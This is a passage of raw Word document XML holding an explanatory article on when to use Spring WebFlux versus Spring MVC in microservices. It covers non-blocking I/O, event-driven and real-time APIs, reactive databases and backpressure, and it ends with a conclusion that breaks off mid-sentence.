          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to manage a large number of concurrent users who are performing read-heavy operations like querying the database for data, WebFlux can be highly efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C91E5" w14:textId="77777777" w:rsidR="00312742"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E788D8">
          <v:rect id="_x0000_i2860" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C5CC0B"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2. Non-Blocking I/O Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44319145"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WebFlux is ideal for applications that need to perform I/O operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., network, disk, or database access) without blocking threads. When using WebFlux, I/O operations are performed asynchronously, which means the threads aren’t held up waiting for these operations to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9EE4A6"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your microservice is calling other services via HTTP or querying a database with asynchronous drivers (e.g., MongoDB with reactive support), WebFlux is well-suited for such use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B69351" w14:textId="77777777" w:rsidR="00312742"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5798FBF">
          <v:rect id="_x0000_i2861" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="153E4A31"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3. Event-Driven Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B10362"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WebFlux is beneficial for event-driven architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If your microservices need to respond to events or stream data, WebFlux makes it easy to handle streams of data efficiently with a non-blocking approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDB8850"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your service is designed to react to events from a message broker (e.g., Kafka or RabbitMQ) or to process real-time data streams (e.g., WebSockets or Server-Sent Events), WebFlux is a natural fit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57094A5D" w14:textId="77777777" w:rsidR="00312742"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38C84F4">
          <v:rect id="_x0000_i2862" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A76C1CE"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4. Lightweight and Low-Latency Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F5C484"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Use WebFlux when you need lightweight microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are designed to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly responsive</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with minimal latency. WebFlux works well in microservices that are supposed to serve low-latency requests, especially when dealing with APIs that need to scale efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6780DD22"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Real-time chat applications, online gaming services, or live updates where responsiveness and low-latency is a priority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B051BE" w14:textId="77777777" w:rsidR="00312742"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0D55411">
          <v:rect id="_x0000_i2863" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="683CD18B"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5. Microservices with Reactive Backends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FB471"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If your microservice interacts with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive backend</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB Reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cassandra Reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Redis Reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or any other reactive data source), then WebFlux fits naturally because both the backend and the web layer are using non-blocking operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F9F897"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When your application uses a reactive NoSQL database like MongoDB (with its reactive driver) or another reactive database that supports asynchronous queries, you can build the entire service using WebFlux to maintain consistency in the application stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC292C5" w14:textId="77777777" w:rsidR="00312742"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306D856">
          <v:rect id="_x0000_i2864" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69857697"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6. APIs Requiring Real-Time or Long-Polling Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402375B1"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lastRenderedPageBreak/>
        <w:t>Use WebFlux for applications requiring long-polling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time data streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebSockets</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Server-Sent Events (SSE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. WebFlux makes it easier to create such APIs where a client needs to receive real-time updates from the server without repeatedly polling it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B66E44A"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Push notifications, live feeds (e.g., social media posts), and IoT-based real-time data processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2550AE52" w14:textId="77777777" w:rsidR="00312742"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8A60BA6">
          <v:rect id="_x0000_i2865" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C458D"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7. Microservices with Low Resource Usage Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A44E9D1"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WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be highly efficient in environments where resource consumption needs to be minimal. Since WebFlux uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and asynchronous processing, it’s more efficient in terms of memory and CPU usage compared to traditional blocking models like in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CAEE97"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Microservices deployed on resource-constrained environments (e.g., edge devices, or serverless platforms) that need to maximize resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242FCD68" w14:textId="77777777" w:rsidR="00312742"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5199FD2">
          <v:rect id="_x0000_i2866" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E7CB3F"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8. Need for Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D2021"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WebFlux provides built-in backpressure handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. When a system is overwhelmed by too many requests or events, it can apply </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent the system from becoming unresponsive by slowing down the rate at which it processes data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28766F93"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For high-load applications, such as real-time analytics or systems where you’re processing incoming data from sensors or logs, backpressure ensures that the system doesn't crash under load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A32F38" w14:textId="77777777" w:rsidR="00312742"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31514D4">
          <v:rect id="_x0000_i2867" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="295768DD"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When Not to Use WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195EA0E2"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Simple CRUD Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If your application is a simple </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CRUD</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> application with limited scaling requirements and doesn’t have many concurrent connections, you might not need the complexity of reactive programming. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a traditional thread-per-request model is often sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4EB339"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Blocking or CPU-Intensive Workloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: WebFlux works best when dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I/O-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations (network calls, database queries). If your microservices are </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, WebFlux might not offer a significant advantage over a traditional Spring MVC approach, as WebFlux is optimized for concurrency and I/O, not CPU-heavy tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3E8999" w14:textId="77777777" w:rsidR="00312742"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ACCE52D">
          <v:rect id="_x0000_i2868" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="563157AC"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFD37F4"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365856A5"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Your microservices handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high-concurrency, real-time, or event-driven workloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7600CAF5"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You need to work with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous and non-blocking I/O operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17772319"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Your microservices interact with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive data sources</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508A46EE"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You need to build </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>low-latency and resource-efficient services</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CFF1EC"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On the other hand, for simple, CPU-bound applications or those with low concurrency, traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> might be easier and more efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B80E64B"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WebFlux is a powerful framework that enhances your microservices with the benefits of </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
